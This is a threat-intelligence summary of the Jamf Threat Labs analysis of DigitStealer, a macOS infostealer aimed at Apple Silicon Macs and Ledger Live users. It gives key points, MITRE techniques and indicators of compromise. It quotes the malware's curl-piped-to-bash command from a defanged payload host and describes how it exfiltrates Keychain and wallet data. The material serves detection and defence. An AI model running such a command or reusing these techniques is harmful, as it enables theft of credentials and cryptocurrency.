Jamf Threat Labs analyzed a new macOS infostealer family named DigitStealer that uses unsigned disk images, multi-stage in-memory payloads, AppleScript/JXA, and hardware-based sysctl checks to target Apple Silicon M2+ systems and evade detection. The campaign modifies Ledger Live to redirect endpoints, exfiltrates credentials and files to attacker-controlled domains (notably goldenticketsshop[.]com), and achieves persistence via a Launch Agent that dynamically retrieves backdoor payloads. #DigitStealer #LedgerLive
Keypoints
- DigitStealer was delivered via unsigned disk images (example: DynamicLake.dmg) using a drag-to-terminal technique to bypass Gatekeeper and achieve initial execution.
- The dropper uses curl piped to bash and executes multiple in-memory payloads (osascript/JXA and bash), splitting functionality across four staged payloads to reduce detection.
- The malware includes novel hardware checks via sysctl to restrict execution to Apple Silicon M2 or newer (checks for FEAT_BTI, FEAT_SSBS, FEAT_ECV, FEAT_RPRES) and avoids VMs, Intel Macs, and M1 devices.
- Payloads collect and exfiltrate credentials, browser data, wallet files, Keychain DB, VPN configs and other user files to attacker-controlled endpoints (goldenticketsshop[.]com/api/credentials and /api/grabber).
- Actors tamper with Ledger Live by reconstructing and swapping app.asar from multiple parts and by modifying app.json to point Ledger Live to an attacker-controlled endpoint for wallet data theft.
- Persistence is implemented via a Launch Agent that fetches its payload dynamically from a TXT record on goldenticketsshop[.]com; a persistent JXA backdoor polls the C2 every ~10 seconds.
MITRE Techniques
- [T1204 ] User Execution (Malicious File) – Initial delivery relies on a user drag-to-terminal action to override Gatekeeper and run the installer. [‘leveraging the familiar drag-to-terminal technique to override Gatekeeper and gain initial code execution.’]
- [T1105 ] Ingress Tool Transfer – The dropper retrieves multiple remote payloads using curl and writes/executes them in memory. [‘curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash’]
- [T1059 ] Command and Scripting Interpreter – Malware executes code via bash, osascript (AppleScript) and JXA to perform theft and system modification. [‘each payload is executed in memory and passed directly to osascript, JavaScript for Automation (JXA), or bash.’]
- [T1555.003 ] Credentials from Password Stores: Keychain – The stealer collects Keychain database files for credential harvesting. [‘Keychain database from ~/Library/Keychains/login.keychain-db’]
- [T1041 ] Exfiltration Over C2 Channel – Stolen credentials and files are uploaded to attacker-controlled endpoints on goldenticketsshop[.]com. [‘Exfiltrates credentials and files to the attacker domain https[:]//goldenticketsshop[.]com using two endpoints: /api/credentials (credential submissions) and /api/grabber (file uploads)’]
- [T1547 ] Boot or Logon Autostart Execution – Persistence is achieved by dropping and loading a Launch Agent that dynamically fetches its payload at runtime. [‘drops and loads a persistence item in the form of a Launch Agent’]
Indicators of Compromise
- [File hash ] Installer disk image SHA-256 – 5c73987e642b8f8067c2f2b92af9fd923c25b2ec
- [Domain ] Malicious distribution and C2 domains – dynamiclake[.]org, goldenticketsshop[.]com (typosquat of goldenticketshop[.]com)
- [URLs/Hosts ] Payload hosting on Cloudflare Pages – 67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx and other pages.dev hosts
- [File names ] Malicious installer and scripts – DynamicLake.dmg, Drag Into Terminal.msi (text file with curl command)
- [File paths ] Targeted/local artifacts – ~/Library/Keychains/login.keychain-db, ~/Library/Application Support/Ledger Live/app.json
- [DNS/TXT record ] Dynamic payload retrieval mechanism – TXT record hosted on goldenticketsshop[.]com used to store endpoint to fetch backdoor payload
Read more: https://www.jamf.com/blog/jtl-digitstealer-macos-infostealer-analysis/